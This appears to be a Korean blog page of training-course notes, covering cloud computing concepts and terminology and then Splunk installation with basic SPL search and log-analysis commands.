컨테이너 재해 복구 계획

[SK shieldus Rookies 16기][클라우드 보안 컨설팅 실무] 클라우드컴퓨팅서비스 개요와 기초

Wed, 17 Jan 2024 00:39:02 GMT

알아두면 좋은 용어

CCE(Common Configuration Enumeration) : 사용자에게 허용된 권한 이상의 동작을 허용하거나 범위 이상의 정보 열람, 변조, 유출 등을 가능하게 하는 시스템 설정 상의 취약점
CVE(Common Vulnerabilities and Exposures) :
- 컴퓨터 하드웨어 또는 소프트웨어 결합이나 체계, 설계상의 취약점
- 공개적으로 알려진 보안 취약점에 대한 공통 식별자 목록으로 표준화된 CVE 항목은 서비스 적용 범위를 평가할 수 있는 기준 제공

1. 클라우드 보안 컨설팅 분야

국내외 클라우드 보안 인증지원 컨설팅
클라우드 보안관리체계 수립
클라우드 보안 SP/MP
클라우드 보안평가
클라우드 보안 아키텍처 컨설팅
클라우드 보안감사
금융 클라우드 이용신고대응 보안컨설팅 ⇒ 전자금융감독규정 제14조의2제5항
클라우드 취약점 분석 및 평가
국가 클라우드컴퓨팅서비스 도입 보안컨설팅

2. 온프레미스(On-premise)

2.1. 정의

IT서비스를 운영하는 회사가 자체적으로 보유한 공간에 물리적으로 하드웨어 장비를 가지고 직접 운영하는 방식. 클라우드 컴퓨팅 기술이 나오기 전 사용하던 일반적인 인프라 구축 방법

3. 클라우드컴퓨팅서비스(Cloud Computing Service)

3.1. 정의

온디맨드로 서비스에 엑세스
대규모 사전 투자방지
필요에 따라 컴퓨팅 리소스를 프로비저닝
사용한 만큼만 비용을 지불

3.2. 이점

클라우드 기반 배포
- 애플리케이션의 모든 부분을 클라우드에서 실행
- 기존 애플리케이션을 클라우드로 마이그레이션
  - 온프레미스 → 오프프레미스
- 클라우드에서 새로운 애플리케이션 설계 및 구축 가능
가변 비용
비용 최적화
필요에 따른 용량 축소(Scale in) 및 확장(Scale out) 가능
속도 및 민첩성
- 데이터센터 : 리소스 필요 시점과 리소스 확보 시점 간의 간격이 주 단위
- 클라우드 컴퓨팅 : 리소스 필요 시점과 리소스 확보 시점 간의 간격이 분 단위
빠른 배포 가능

3.3. 용어

ISO/IEC 22123-1:2023(국제표준 클라우드컴퓨팅 용어)에서 정의한 용어

클라우드 서비스 제공자 (CSP : Cloud Service Provider) :
- 클라우드 서비스를 제공하는 업체
클라우드 서비스 고객(CSC : Cloud Service Customer) :
- 클라우드 서비스를 호출하여 이용하는 고객
클라우드 서비스 파트너/브로커(CSN : Cloud Service partNer) :
- 클라우드 서비스 제공자(CSP) 또는 고객(CSC)의 활동을 지원하거나 보조
클라우드 컴퓨팅(Cloud Computing) :
- 셀프서비스 및 주문형 관리, 공유 가능한 확장성과 탄력성 있는 물리적 또는 가상적인 리소스 풀에 대한 네트워크 접근을 제공하는 패러다임
클라우드 컴퓨팅 서비스(Cloud Computing Service) :
- 사용자가 정의된 인터페이스를 통해 필요한 컴퓨팅 리소스를 유연하게 호출하고, 이를 네트워크를 통해 원격으로 이용할 수 있는 서비스
** 클라우드 서비스 범주모델(Cloud Service Party Model)** :
- 클라우드 컴퓨팅 서비스를 제공하는 방식을 분류한 것
  1. IaaS (Infrastructure as a Service)
  2. PaaS (Platform as a Service)
  3. SaaS (Software as a Service)
  4. NaaS (Network as a Service)
  5. SECaaS (Security as a Service)
  6. AlaaS (Artificial Intelligence as a Service) 등
클라우드 서비스 배치모델(Cloud Service Deployment Model) :
- 클라우드 인프라의 위치와 운영에 따라 분류한 것
  1. 공용(Public) 클라우드
  2. 사설(Private) 클라우드
  3. 커뮤니티(Community) 클라우드
  4. 하이브리드(Hybrid) 클라우드
인프라형 서비스(IaaS : Infrastructure as a Service) :
- 고객은 물리적이나 가상적인 기본 리소스를 직접 관리하지 않지만, 가상 리소스를 활용하여 운영 체제, 저장 장치, 그리고 애플리케이션을 통제
플랫폼형 서비스(PaaS : Platform as a Service) :
- 고객은 지원하는 프로그래밍 언어와 실행 환경을 활용하여 애플리케이션을 생성하고 관리하며 실행할 수 있는 클라우드 능력 유형
소프트웨어형 서비스(SaaS : Software as a Service) :
- 클라우드 서비스 제공자가 고객에게 제공하는 애플리케이션 유형
- 고객은 자체 데이터를 생성, 이용, 삭제 가능
클라우드 서비스 고객 데이터(Cloud Service Customer Data) :
- 법령, 인터페이스를 통한 능력 행사 결과로 클라우드 서비스에 투입된 데이터 객체 클래스
- 고객 통제 하에 있는 데이터 객체 클래스
데이터 이식성(Data Portability) :
- 시스템 간에 데이터를 손쉽게 전송하는 능력
- 소스 시스템과 목표 시스템 간의 양식 일치가 중요
종량제 서비스(Measured Service) :
- 클라우드 서비스 사용량을 측정하여 감시, 제어, 보고, 청구하는 서비스
멀티 테넌시 or 테넌트(Multi-Tenancy(=Tenant) :
- 여러 클라우드 서비스 사용자가 공유된 11개의 물리적 또는 가상적인 리소스 집합에 접근하는 것을 의미
- SaaS형 서비스에서 많이 사용하는 용어
가역성(Reversibility) :
- 클라우드 서비스 고객은 자신의 데이터와 애플리케이션을 회수하며, 계약 종료 후 클라우드 서비스 제공자가 명시된 데이터를 모두 삭제
공용(Public) 클라우드 :
- 인터넷에 접속 가능한 모든 사용자를 대상으로 하는 클라우드 서비스 모델
- 각 서비스는 사용자 간에 권한을 격리하여 간섭 X
사설(Private) 클라우드 :
- 제한된 네트워크에서 특정 기업이나 사용자를 대상으로 하는 클라우드 서비스 모델
- 자원과 데이터는 해당 기업 내부에 저장되고 기업은 자원의 제어 권한을 갖음
- 높은 보안성과 개별화된 클라우드 기능 커스터마이징이 가능
커뮤니티(Community) 클라우드 :
- 커뮤니티 클라우드는 여러 고객이 공동 프로젝트나 애플리케이션에서 협업할 수 있도록 중앙 집중식 클라우드 인프라를 공유하는 모델
- 다양한 클라우드 솔루션을 통합하여 비즈니스 부문의 특정 문제를 해결하는 분산 인프라를 제공
하이브리드(Hybrid) 클라우드 :
- 22개의 클라우드 배치 모델(Public/Private/Community 또는 On-premise/Off-premise)을 이용하는 모델
- 퍼블릭 클라우드의 유연성, 경제성, 신속성과 물리 서버의 보안성, 안정성을 동시에 활용할 수 있는 장점 有
상호운용성(Interoperability) :
- 둘 이상의 클라우드 컴퓨팅 시스템 또는 애플리케이션이 정보를 교환하고 상호적으로 사용하는 능력
클라우드 애플리케이션 이식성(Cloud Application Portability) :
- 애플리케이션이 클라우드 컴퓨팅을 통해 제공되는 능력을 다른 클라우드 서비스로 이적하는 능력
클라우드 감사자(Cloud Auditor) :
- 클라우드 서비스 정의된 인터페이스를 통해 호출한 능력의 제공과 사용에 대한 감사 책임을 수행하는 역할을 하는 클라우드 서비스 파트너(CSN)
데이터저장형 서비스(DDaaS : Data Storage as a Service) :
- 클라우드 서비스 범주 중 데이터 저장 및 관련 능력을 클라우드 서비스 고객에게 제공
네트워크형 서비스(NaaS : Network as a Service) :
- 클라우드 서비스 범주
- 전송 연결성과 관련된 네트워크 능력을 클라우드 서비스 고객에게 제공
- 네트워크 서비스는 애플리케이션, 인프라, 플랫폼 능력 중 하나를 제공
인공지능형 서비스(AIaaS : AI as a Service) :
- 클라우드 서비스 제공자(CSP)가 클라우드 서비스 고객(CSC)에게 다양한 AI 기반 기능을 포함한 인공지능 소프트웨어를 서비스 형태로 제공하는 것을 의미
멀티클라우드(Multi Cloud) :
- 클라우드 서비스 고객(CSC)이 둘 이상의 클라우드 서비스 제공 업체의 퍼블릭 클라우드 서비스를 사용하는 배포 모델
연합클라우드(Federated Cloud) :
- 클라우드 서비스 연합(Federation)은 클라우드 서비스를 제공하는 클라우드 배포 모델
클라우드서비스연합(Cloud Service Federation) :
- 클라우드 서비스를 제공하기 위해 합의된 정책, 프로세스 및 신뢰에 의해 결합된 두 개 이상의 클라우드 서비스 제공 업체를 나타내는 클라우드 서비스 연합
상호간클라우드(Inter Cloud) :
- 클라우드 서비스 제공자(CSP)가 다른 클라우드 서비스 제공자가 제공하는 하나 이상의 클라우드 서비스를 활용하여 서비스를 제공하는 클라우드 배포 모델
클라우드 서비스 이용자(Cloud Service User) :
- 클라우드 서비스를 사용하는 클라우드 서비스 고객과 관련된 자연인 또는 이들을 대리하는 법인
서비스형 컨택센터(CCaaS : Contact Center as a Service) :
- 클라우드 기반 고객 경험 솔루션
- AI 기반 솔루션도 제공 가능
- 기업은 외부 제공 업체의 소프트웨어를 활용하여 필요한 기술만 선택할 수 있어 내부 IT 지원의 필요성이 감소

4. 클라우드컴퓨팅서비스 기초

4.1. 클라우드컴퓨팅서비스 인프라 구성

클라우드 컴퓨팅 인프라 구성요소 = 클라우드 서비스 제공자(CSP) + 리전(Region) + VPC + 가용영역(AZ)

4.2. ISO/IEC 22123-3 기반의 클라우드 컴퓨팅 정의된 모델

필수 특성
1. Broad Network Access (광범위한 네트워크 접근성) :
  - 네트워크를 통해 모든 리소스 접근 및 사용할 수 있음
2. *Rapid Elasticity (신속한 탄력성) : *
  - 리소스 풀을 통해 리소스를 자동으로 확장/축소할 수 있음
3. *Measured Service (측정 가능한 서비스) : *
  - 리소스의 사용량이 측정, 모니터링되며 사용량에 따라 과금이 이루어짐
4. *On-Demand Self-Service (주문형 셀프서비스) : *
  - CSC가 CSP 개입 없이 원하는 시점에 필요한 서비스를 이용 가능
5. *Resource Pooling (자원 공유) : *
  - 리소스는 다중-임대(multi-tenant)방식으로 다중 사용자에게 제공되기 위해 풀(Pool) 형태로 유지 및 풀링 가능

4.3. 클라우드 컴퓨팅 논리적 모델

Infostructure :
- 데이터 및 정보. 데이터베이스, 파일 저장소 등의 콘텐츠
Applistructure :
- 클라우드에 배포된 애플리케이션과 해당 애플리케이션을 구축하는 데 사용된 기본 애플리케이션 서비스는 서비스형 플랫폼 기능을 포함 (ex. 고객 콜센터, 인공 지능 분석, 알림 서비스 등)
Merastructure :
- 인프라 계층과 다른 계층 간의 인터페이스를 제공하는 프로토콜 및 메커니즘
- 클라우드 컴퓨팅 환경과 이용자의 On-Premise 정통 IT 환경 사이에 정의된 구성 및 관리
Infrastructure :
- 컴퓨팅 시스템의 핵심 구성 요소 : 컴퓨팅, 네트워크, 스토리지

4.4. 클라우드 12계층

물리적 부대설비 / 데이터 센터 :
- 컴퓨팅 시스템 및 관련 하드웨어 장비를 저장하는 물리적 위치
- 서버, 데이터 스토리지 드라이브, 네트워크 장비와 같이 IT 시스템에 필요한 컴퓨팅 인프라가 포함
네트워크 :
- 데이터 센터 내의 서버와 외부 세계 사이의 통신을 가능케 해줌
- 데이터 전송, 사용자 접속, 서비스 제공 등에 필수적
데이터 스토리지 :
- 사용자가 필요에 따라 데이터를 저장하고 검색할 수 있는 공간 제공
- 파일 저장, 데이터베이스 관리, 백업 및 복구 등에 사용
프로세싱 및 메모리 :
- 애플리케이션 실행, 데이터 처리, 가상화 작업 등에 사용
하이퍼바이저 :
- 물리적 서버의 리소스를 가상화하여 여러 가상 머신을 생성, 관리하는 소프트웨어 또는 하드웨어
가상 네트워크 인프라스트럭처 :
- 물리적 네트워크 리소스를 가상화하여 보안성, 확장성, 효율성을 높임
- VPN은 이런 가상 네트워크를 안전하게 연결하는데 사용
가상머신 (Virtual Machines) :
- 하이퍼바이저에 의해 생성
- 각각의 가상머신은 독립적인 운영체제와 애플리케이션 실행 가능
운영 체제 (OS) :
- 가상머신에서 실행
- 하드웨어 리소스를 관리하고 사용자와 시스템 간의 인터페이스 제공
솔루션 스택 (Programming Languages) :
- 특정 프로그래밍 언어, 라이브러리, 서비스 등을 포함하여 개발자가 애플리케이션과 서비스를 개발하고 배포할 수 있음
응용 프로그램 :
- 클라우드 환경에서 실행되는 소프트웨어 프로그램
- 웹 서비스, 데이터베이스 애플리케이션, AI, 머신러닝 모델 등 다양한 형태
인터페이스 (APIs, GUIs) :
- 사용자와 시스템 간의 상호작용을 지원
데이터 :
- 클라우드 환경에서 생성, 처리, 저장되는 정보

4.5. 클라우드 서비스 범주 모델 영역

IaaS(Infrastructure as a Service) :
- 역할 :
  1. 가상 호스팅
  2. 운영체제 제공 ⇒ 보안 강화 설정, 네트워크 설정, 환경설정은 제공 X
  3. 사용자(CSC)가 직접 운영체제 및 응용 프로그램 관리
  4. 개발자와 인프라 관리자 간의 역할 분담
- 장점 :
  1. 하드웨어 관리 간소화
  2. 완전한 인프라 제공(데이터 센터, 네트워크 장비, 저장장치, 하이퍼바이저)
- 단점 :
  1. 제한된 인프라 접근과 통제
  2. 사용자(CSC)가 게스트 OS 대한 모든 관리
  3. 사용자(CSC)가 응용 프로그램 개발 및 설치
PaaS(Platform as a Service) :
- 역할 :
  1. 사용자(CSC)는 시스템 모니터링만 관리 ⇒ 운영체제, 서버용 하드웨어, 네트워크 등과 같은 기본 인프라 관리는 클라우드 서비스 제공자(CSP)가 관리
  2. 응용 프로그램 개발에 집중 가능
- 장점 :
  1. 오토 스케일링 및 관리 제공
  2. 가장 이상적인 응용 프로그램 플랫폼
- 단점 :
  1. 플랫폼 종속성 ⇒ 다른 플랫폼 이동 어려움, 스택을 종속으로 사용하면 다른 환경에서 실행 어려움
  2. 자체 스택 사용의 한계 ⇒ 종속되지 않으려면 자체 플랫폼과 스택 설치 및 적용해야하지만 PaaS의 장점을 제대로 활용하지 못할 수도 있음.
- 특징 :
  1. 마이크로 아키텍처(MSA)는 클라우드 환경에 최적화된 응용SW설계 기법
  2. DevOps를 통한 클라우드 응용 소프트웨어 개발 및 운영 환경 제공
  3. 표준화된 런타임 제공

💡 DevOps란? 기존에는 개발과 운영팀이 분리되어 있었고, 다수의 개발과 운영 공정을 수작업으로 수행했지만 DevOps는 파이프라인 기반의 빌드, 테스트, 배포 자동화 환경을 이용하여 DevOps팀에서 응용SW의 개발과 운영 모두 수행

SaaS(Software as a Service) :
- 역할 :
  1. 서비스 제공자(CSP)가 응용 프로그램 제공 및 사용 가능
  2. 소비자 관점에서 제공되는 IT 방식의 서비스
  3. 서비스 제공자(CSP)에게 구독 방식으로 수익 얻을 수 있음
- 장점 :
  1. 퍼블릭 클라우드 서비스에 있는 소프트웨어를 웹 브라우저나 클라우드 클라이언트 소프트웨어를 통해 사용 가능
  2. 서비스 제공자(CSP)가 자동으로 최신 소프트웨어 제공 및 사용 가능
  3. 암호화된 데이터 통신 가능(VPN, SSL)
- 단점 :
  - SaaS 특성상 서비스 제공자(CSP)가 제공하는 소프트웨어나 패키지 기반의 소프트웨어만 사용 가능
- 특징 :
  - 테넌트 : SaaS의 단위, 사용자 별로 격리된 환경인 테넌트 제공
  - 애플리케이션과 데이터
  - 보안
  - 가용성
  - 확장성
  - 과금

💡 테넌트란? Tenant는 임차인이라는 뜻을 가지고 있습니다. 자신의 건물이 아닌, 다른 건물을 빌려서 사용하는 주체입니다. SaaS 에서도 이와 동일하게 생각하시면 됩니다. 자신의 자원이 아닌 서비스 제공자의 클라우드 자원을 빌려서 서비스를 이용하는 주체가 Tenant 입니다. 즉, 짧게 요약하면 서비스 제공자의 클라우드 리소스를 사용하는 자 출처: https://maily.so/saascenter/posts/de82fda4

4.6. ISO/IEC 22123-3:2023 기반의 클라우드 컴퓨팅 참조 아키텍처

1) 클라우드 컴퓨팅 교차적(Cross-Cutting) 측면 13분야

감사 가능성 (Auditability) :
- 클라우드 서비스 사용과 관리에 대한 감사를 수행하는 능력, 로그 및 모니터링 시스템을 사용하여 활동 추적.
클라우드 가용성 (Cloud Availability) :
- 클라우드 서비스가 언제든지 사용 가능한 상태를 유지하는 능력, 지속적인 서비스 제공이 목표.
거버넌스 (Governance) :
- 클라우드 서비스의 운영과 관리에 대한 전반적인 통제와 지휘를 의미, 규정, 정책, 프로세스로 효과적 관리.
상호운용성 (Interoperability) :
- 서로 다른 클라우드 서비스 간에 데이터와 애플리케이션을 교환하고 사용하는 능력, 표준화된 형식과 프로토콜을 준수.
유지보수 및 버저닝 (Maintenance and Versioning) :
- 클라우드 서비스의 유지보수와 버전 관리 능력, 기능 추가, 버그 수정, 보안 업데이트를 체계적으로 관리.
클라우드 성능 (Cloud Performance) :
- 클라우드 서비스가 사용자의 요구를 충족하는 데 필요한 성능 유지, 응답 시간과 처리량을 확인.
이식성 (Portability) :
- 클라우드 서비스 간에 애플리케이션과 데이터를 쉽게 이동시킬 수 있는 유연성, 벤더 락인을 피하고 다양한 환경에서 사용 가능.
개인식별정보 보호 (Personal Data Protection) :
- 클라우드 서비스 사용자의 개인정보 보호 능력, 데이터 암호화, 접근 제어, 규정 준수 등.
회복력 (Resilience) :
- 클라우드 서비스가 장애 시 원래 상태로 신속히 복구하는 능력, 데이터 백업과 비상 복구 계획 수립.
가역성 (Reversibility) :
- 클라우드 서비스에서의 데이터 삭제나 중단 시 효과를 취소하는 능력, 안전한 이행 계획 제시.
규제 준수 (Regulatory Compliance) :
- 모든 법률과 규정을 준수하는 능력, 특히 데이터 보호와 개인정보 보안과 관련된 규제를 준수.
클라우드 보안 (Cloud Security) :
- 클라우드 서비스와 관련된 정보를 보호하는 능력, 암호화, 인증, 접근 제어 등으로 보안 유지.
서비스 수준 협약 (SLA - Service Level Agreement) :
- 서비스 제공자와 사용자 간의 계약으로 서비스 품질, 가용성 등을 명시, 사용자에게 서비스 기준과 의무 제시.

2) 사용자 측면(Aspect & User)

클라우드 서비스 고객(CSC) 역할 :
- 클라우드 서비스 사용자(CSU)
- 클라우드 서비스 관리자(Administrator)
- 클라우드 서비스 비즈니스 관리자(Manager)
- 클라우드 서비스 통합자(Integrator)
클라우드 서비스 제공자(CSP) 역할 :
- 클라우드 서비스 운영 관리자
- 클라우드 서비스 배포 관리자
- 클라우드 서비스 관리자
- 클라우드 서비스 비즈니스 관리자
- 고객 지원 및 관리 담당자
- 클라우드 간 제공자(Inter-Cloud)
- 클라우드 서비스 보안 및 위험 관리자
  - ISO/IEC 27005 국제 표준 정보보안 위험관리 시스템을 통해 위험 식별
- 네트워크 제공자
클라우드 서비스 파트너(CSN) 역할 :
- 클라우드 서비스 개발자(Cloud Service Developer)
- 클라우드 서비스 브로커(CSB)
- 매니지드 서비스 제공자(Managed Service Provider)
- 클라우드 서비스 감사자

5. Cloud Well Architected Framework 모범사례

운영 우수성
보안
안정성
성능 효율성
비용 최적화
지속가능성

보안 :
- 보안 원칙에는 클라우드 기술을 활용하여 보안을 강화하고 데이터, 시스템 및 자산을 보호하는 능력이 포함
- 보안 모범 사례 및 관련 리소스 참조
- 안전한 워크로드 운영 :
  - 워크로드를 안전하게 운영하려면 모든 보안 영역에 포괄적 모범 사례를 적용
  - AWS 및 업계 권장 사항 및 위협 인텔리전스를 최신 상태로 유지하면 위협 모델 및 제어 목표를 발전시키는 데 도움이 됨
  - 보안 프로세스, 테스트 및 검증을 자동화함으로써 보안 작업을 확장
1. 자격증명 및 액세스 관리 :
- 사람에 의한 자격증명(RRAC)
- 시스템 자체에 대한 자격증명(SaaS)
- 자격 증명 공유 불가 X
1. 탐지 :
- 위험 식별
1. *인프라 보호 : *
- 네트워크 리스소 보호 방법 :
  - 라우터, 스위치 등
- 컴퓨팅 리소스 보호 방법 :
  - EC2 인스턴스, 컨테이너, AWS Lambda 함수, DB서비스, IoT 디바이스 등
1. 데이터 보호 :
- 데이터 거버넌스
- 데이터 분류체계
  - 기밀 데이터 : 암호화 대상(대칭키 기반)
  - 중요 데이터 : 암호화 대상(대칭키 기반)
  - 대외비 데이터
  - 일반 데이터
- 네트워크 보안 프로토콜 SSL, IPSec, TLS 사용
- 서드파티 솔루션 사용
1. 사고 대응
- 침해공격에 대한 유형 파악
- 침해공격에 대한 대응 수준 단계 고려
- 클라우드 컴퓨팅 서비스 상에서 악성 코드를 차단/삭제/격리 여부 결정
- 침해사고 대응 조직 및 프로세스 설계
- 장애 예상
- 사후 데이터를 어떻게 할 것인지 고려
- 전자적 증거 확보 및 디지털 포렌식
- 관계 기관에 신고 (검찰청, 경찰청, KISA)

6. Cloud Adoption Framework(CAP)

6.1. 클라우드 혁신 가치 사슬 모델

구상
조정
시작
확장

6.2. 일반적인 클라우드 기반 백업 방식 종류 및 백업 가능 대상

크로스-리전 백업 :
- 다른 지역의 서버로 복사
- 특정 지역에서 재해가 발생해도 데이터를 안전하게 보호 가능
크로스-계정 백업 :
- 조직관리 서비스 등을 이용하여 다른 클라우드 계정으로 백업
- 계정이 손상되거나 해킹당한 경우에도 데이터 보호 가능
증분 백업 :
- 마지막 백업 이후 변경된 데이터만 복사
- 스토리지 공간 효율적으로 사용 가능 및 백업 시간 ↓
연속 백업 및 지정 시간 복구(PTTR) :
- 연속 백업 : 데이터가 변경될 때마다 실시간으로 백업
  - 데이터 손실 최소화, 언제든지 최신 상태 데이터 복원 가능
- 지정 시간 복구(PTTR) : 과거 특정 시점의 상태로 데이터 복원
  - 실수로 데이터 삭제, 애플리케이션 오류로 인한 데이터 손상된 경우 복원 가능
- 컴퓨팅, 블록 스토리지는 백업 지원 X
전체 백업 :
- 모든 데이터를 복사
- 데이터 복구 간단
- 스토리지 공간 많이 차지, 백업시간 긺
- 블록 스토리지, RDS 단일 인스턴스 백업 지원 X

6.3. AWS CAF 관점의 6가지 기본역량

비지니스(Business) :
- 전략관리
- 포트폴리오 관리
- 혁신 관리
- 제품관리
- 전략적 파트너쉽
- 데이터 수익화
- 비지니스 인사이트
- 데이터 과학
사람(People) :
- 문화의 진화
- 혁신적 리더십
- 클라우드 숙련
- 인력 혁신
- 변화 가속화
- 조직 설계
- 조직 연계
거버넌스(Governance) :
- 프로그램 및 프로젝트 관리
- 이익 관리
- 위험 관리
- 클라우드 재무관리
- 애플리케이션 포트폴리오 관리
- 데이터 거버넌스
- 데이터 큐레이션
플랫폼(Platform) :
- 플랫폼 아키텍처
- 데이터 아키텍처
- 플랫폼 엔지니어링
- 데이터 엔지니어링
- 프로비저닝 및 오케스트레이션
- 현대적 앱 개발
- CI/CD
보안(Security) :
- 보안 거버넌스
  - 클라우드에 대한 거버넌스(서비스를 운영하기 위해 필요한 규칙, 정책, 권고사항 등을 정의한 것)
- 보안 보증
  - Certification
- 자격 증명 및 액세스 관리
  - IAM 계정 생성 및 인증방식
  - 암호 알고리즘, 암호화 방식 결정
  - IAM에 대한 정책 부여
- 위협 탐지
  - ZTA(Zero Trust Architecture) 고려
- 취약성 관리
  - CCCV
- 인프라 보호
  - 테넌트 보안
- 데이터 보호
- 애플리케이션 보안
  - 소프트웨어 개발 과정 중 보안 취약성 탐지 및 해결
- 인시던트 대응
  - 보안 인시던트에 효과적으로 대응하여 잠재적 피해 완화
운영(Operation) :
- 관측성
- 이벤트 관리(AIOps)
- 인시던트 및 문제 관리
  - 장애 원인이 사라지면 해결되는게 인시던트
  - 장애에 대한 조치 해결+원인분석까지 하면 문제
  - 둘다 케이스로 처리, 해결되면 case close
- 변경 및 릴리즈 관리
- 성능 및 용량 관리
- 구성 관리
- 패치 관리
- 가용성 및 연속성 관리
- 애플리케이션 관리

7. 클라우드 네이티브(Cloud Native)

7.1. 정의

현대적인 클라우드 기반 애플리케이션의 환경
PaaS 서비스 환경에서 주로 사용

7.2. 클라우드 네이티브의 4가지 구성요소

Container : 애플리케이션과 종속성을 패키지화해서 실행환경에 대한 일관성 제공
DevOps : 애플리케이션 개발-운영 간의 협업 프로세스 자동화
CI/CD : 지속적인 통합/지속적인 개발
MSA(Microservices Architecture) : 애플리케이션을 독립적인 서비스로 분리하여 각 서비스가 독립적으로 배포 및 확장되게 함

7.3. 클라우드 네이티브 보안

클라우드 네이티브 보안은 계충화된 접근방식을 통해 소프트웨어 시스템을 심층적으로 방어한다.

클라우드 네이티브 보안의 4C :
1. 클라우드(Cloud)
2. 클러스터(Cluster)
3. 컨테이너(Container)
4. 코드(Code)
*보안 방법 : *
- 제로 트러스트 아키텍처
- 인터넷 노출 제어
- 안전한 파일 저장
- 최소 권한 원칙
- 로그 데이터 마스킹
- 자산관리
- 계정권한 관리와 보안 설정
- 단계별 보안
- 클라우드 네이티브 보안 플랫폼(CNSP, Cloud Native Security Platform)

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] Splunk 설치 및 사용방법, DNS 로그 분석, HTTP 로그 분석, EndPoint 로그 분석

Fri, 12 Jan 2024 00:32:17 GMT

1. Splunk

1.1. 정의

SIEM(Security Information & Event Management) 솔루션 중 하나로 기업 정보에 대한 종합 관제 솔루션

Splunk Forwarder는 Agent 프로그램으로 실시간으로 Splunk Server에 로그를 보내준다.

1.2. Splunk 평가판 및 튜토리얼 데이터 파일 다운로드

Splunk 소프트웨어 평가판 다운로드 🔗

Splunk Cloud : 평가판 15일 동안 이용 가능 / 매일 최대 5GB의 데이터를 인덱싱 가능
Splunk Enterprise : 평가판 60일 동안 이용 가능 / 매일 최대 500MB의 데이터를 인덱싱 가능

Tutorial 데이터 파일 다운로드 🔗

tutorialdata.zip 파일을 성공적으로 업로드 하려면 압축해야한다.
- tutorialdata.zip 파일 다운로드 후 압축해제 X
- Prices.csv.zip 파일 다운로드 후 압축해제 X

1.3. Splunk 설치

** [설치환경] **

Win10
Splunk Enterprise 9.0.1 Ver.

Username : splunk / Password : 12345678

1.4. Splunk 접속

http://localhost:8000 또는 http://127.0.0.1:8000 접속 설치할 때 설정했던 Username 과 Password 입력 후 로그인

1.5. Splunk 살펴보기

분석할 데이터 추가하는 방법 : 설정 > 데이터 추가 > 업로드

업로드 하는 파일은 반드시 압축파일 그대로 올리기

파일이 성공적으로 업로드되면 [검색 시작] 클릭

> 를 클릭하면 상세하게 볼 수 있다.

검색을 통해서도 로그를 분석할 수 있지만 Splunk에서 자동으로 분석해서 필드에 대한 통계를 내주기 때문에 필드를 참고할 수 있다.

2. 로그 분석

사내망의 로그들에 대해

HTTP 로그 분석 후 이상징후 탐색
DNS 로그 분석 후 이상징후 탐색
EndPoint 로그 분석 후 이상징후 탐색

3. 검색명령어

키워드 검색 : category 로 시작하는 모든 키워드 찾으려면 와일드 카드 사용 가능
필드 검색
- 필드명 = 필드값
- 검색 후 사이드 바에서 보려고 하는 필드만 선택해서 볼 수 있음
- 검색 시 필드 사이에 공백은 AND 연산자를 의미
문자열 검색
- 문자열 검색 시 대소문자 구분 X error 를 검색결과와 Error 검색결과는 동일
- 연속된 문자열의 경우 "" 사용
연산자 사용 : 연산자 (AND, OR, NOT) 사용 시 대문자로 입력

✅ 검색 시 체크포인트

괄호를 이용하여 우선순위 지정하기
시간 점검하기
자동완성기능 이용하기

3.1. 데이터 나열, 변환

1) table

index=main sourcetype="access_combined_wcookie"
index=main sourcetype=access_combined_wcookie
| table clientip, method, productId, status

2) rename

index=main sourcetype=access_combined_wcookie
| table clientip, action, productId, status
| rename action AS "Customer Action", productId AS ProductID, status AS "HTTP Status"

3) dedup

검색 결과에서 중복 제거

index=main sourcetype=access_combined_wcookie status=404

index=main sourcetype=access_combined_wcookie status=404 | dedup host

4) sort

IP주소를 정렬 할 경우 함수 ip() 또는 num( ) 사용

index=main sourcetype=access_combined_wcookie
| table clientip, action, productId, status
| sort action, -productId

index=main sourcetype=access_combined_wcookie
| table clientip, action, productId, status
| sort -ip(clientip)

3.2. 통계 계산

1) stats

index=main sourcetype="access_combined_wcookie"
| stats sum(bytes), avg(bytes), max(bytes), median(bytes), min(bytes) by clientip

2) top

빈도 수가 많은 값의 순서를 추출

* | top useother=T clientip by method

3) rare

top과 반대의 결과로 빈도 수가 적은 값의 순서를 추출

* | rare useother=T clientip by method

3.3. 시각화

테이블로 표시된 결과를 다양한 차트로도 만들 수 있다.

3.4. 비교분석

1) eval

검사 결과 값의 반환, 검증을 수행하며 함수 실행 결과 값을 반환

# 변수명을 선언
| eval [반환값_저장변수] = 함수(인자1, 인자2..)

sourcetype=access_*
| eval status_code=if(status==200, "OK", "Error")
| table clientip status_code

2) case(X,”Y”,…)

여러 개의 조건을 검증할 때 사용
두 개의 인자가 한 그룹으로 동작
첫 번째 인자가 참인 경우 두 번째 인자의 내용이 반환, 세 번째 인자가 참이면 네 번째 인자가 수행

index=httplog sourcetype=httplog
| eval description=case(error==404, "Not found", error==500, "internal Server Error")
| table clientip description

| eval quarter=case(date_month==“January”, “1Q”, date_month==“April”, “2Q”)

3) cidmatch(“X”,Y)

IP주소 Y가 네트워크 범위 X에 존재하는지 확인
반환 값은 참 또는 거짓이며 두 개의 인자가 사용
첫 번째 CIDR 형식의 네트워크 주소 범위, 두 번째는 검사를 위한 IP 주소가 입력
검색 필터로 사용 가능

| eval local=cidrmatch(“10.0.0.0/8”, “10.10.0.100”)

IP 주소 10.10.0.100이 10.0.0.0/8 대역에 포함되면 true 아니면 false 반환

| where (cidrmatch(“10.0.0.0/8”, ip) OR
(cidrmatch(“172.16.0.0/12”, ip) OR
(cidrmatch(“192.16.0.0/16”, ip)

4) if(X,Y,Z)

X가 참이면 Y를 실행하고 X가 거짓이면 Z실행

* | eval ip1="10.10.0.100", ip2="100.10.0.100"
| eval network1=if(cidrmatch("10.10.0.0/24", ip1),"local", "external"), 
network2=if(cidrmatch("10.10.0.0/24", ip2),"local", "external") # Y
| table ip1, network1, ip2, network2

IP 필드 값이 10.10.0.100이라면 10.10.0.0/24 네트워크에 포함되므로 network1 필드에 “local” 문자열이 저장 IP 필드 값이 100.10.0.100이라면 network2 필드에는 “external” 이 할당

5) like(X,“Y”)

Like 함수의 X필드에서 일부 문자열인 Y를 검색
첫 번째 인자는 대상 필드, 두 번째 인자는 정규 표현식의 탐색 패턴
X에서 Y를 찾을 수 있으면 참을 반환
like 함수의 와일드 카드 문자열은 ‘%’
field 변수가 addr로 시작하는지 검사

…| where like(field, “add%”)

6) match(X,“Y”)

index=httplog sourcetype=httplog
| where NOT match(method, "(GET|POST|-)")
| stats count(src) as src_count by method
| sort - src_count

where절이 True인 경우에만 그 다음 stats나 sort 절을 수행한다.

3.5. 다중 문자열과 시간

1) split(X,”Y”)

